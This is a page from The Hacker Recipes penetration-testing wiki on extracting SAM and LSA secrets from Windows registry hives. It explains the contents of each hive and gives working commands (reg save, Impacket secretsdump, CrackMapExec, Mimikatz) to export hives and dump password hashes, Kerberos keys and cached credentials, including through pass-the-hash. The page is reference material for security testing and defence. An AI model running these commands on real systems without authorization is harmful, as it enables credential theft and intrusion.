The Hacker Recipes
GitHubTwitterKo-fi (one-time support)Patreon (monthly support)
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
Dumping
SAM & LSA secrets
DPAPI secrets
NTDS secrets
LSASS secrets
DCSync
Group Policy Preferences
Network shares
Network protocols
Web browsers
In-memory secrets
🛠️ Cached Kerberos tickets
🛠️ Windows Credential Manager
🛠️ Local files
🛠️ Password managers
Cracking
Bruteforcing
Shuffling
Impersonation
MITM and coerced auths
NTLM
Kerberos
Access controls
Group policies
Built-in groups
Domain settings
🛠️ Trusts
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
SAM & LSA secrets
MITRE ATT&CK™ Sub-techniques T1003.002, T1003.004 and T1003.005

Theory

In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
Hive
Details
Format or credential material
SAM
stores locally cached credentials (referred to as SAM secrets)
LM or NT hashes
SECURITY
stores domain cached credentials (referred to as LSA secrets)
Plaintext passwords
LM or NT hashes
Kerberos keys (DES, AES)
Domain Cached Credentials (DCC1 and DCC2)
Security Questions (L$_SQSA_<SID>)
SYSTEM
contains enough info to decrypt SAM secrets and LSA secrets
N/A
SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.
Credential material
Subsequent attacks
Plaintext passwords
LM and NT hashes
Kerberos keys (RC4, i.e. == NT hash)
Kerberos keys (DES, AES)
Domain Cached Credentials (DCC1 or DCC2)

Practice

Exfiltration

When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.
1
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
2
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
3
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Copied!
When Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.
1
\system32\config\sam
2
\system32\config\security
3
\system32\config\system
Copied!
Hives files can also be exfiltrated from live systems using Volume Shadow Copy.

Secrets dump

Here are some examples and tools that can be used for local/remote/offline dumping.
secretsdump
CrackMapExec
Mimikatz
Impacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).
1
# Remote dumping of SAM & LSA secrets
2
secretsdump.py 'DOMAIN/USER:[email protected]'
3
4
# Remote dumping of SAM & LSA secrets (pass-the-hash)
5
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/[email protected]'
6
7
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
8
secretsdump.py -k 'DOMAIN/[email protected]'
9
10
# Offline dumping of LSA secrets from exported hives
11
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
12
13
# Offline dumping of SAM secrets from exported hives
14
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
15
16
# Offline dumping of SAM & LSA secrets from exported hives
17
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Copied!
CrackMapExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
1
# Remote dumping of SAM/LSA secrets
2
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
3
4
# Remote dumping of SAM/LSA secrets (local user authentication)
5
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
6
7
# Remote dumping of SAM/LSA secrets (pass-the-hash)
8
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
9
10
# Remote dumping of SAM/LSA secrets (pass-the-ticket)
11
crackmapexec smb $TARGETS --kerberos --sam/--lsa
Copied!
Mimikatz can be used locally to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.
1
# Local dumping of SAM secrets on the target
2
lsadump::sam
3
4
# Offline dumping of SAM secrets from exported hives
5
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
6
7
# Local dumping of LSA secrets on the target
8
lsadump::secrets
9
10
# Offline dumping LSA secrets from exported hives
11
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
Copied!
Nota bene secretsdump and crackmapexec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.

References

SysKey and the SAM
Decrypting LSA Secrets
SecretsDump Demystified
Medium
MSCash Hash Primer for Pentesters
WebstersProdigy
Previous
Dumping
Next
DPAPI secrets
Last modified 1mo ago
Copy link
Contents
Theory
Practice
Exfiltration
Secrets dump
References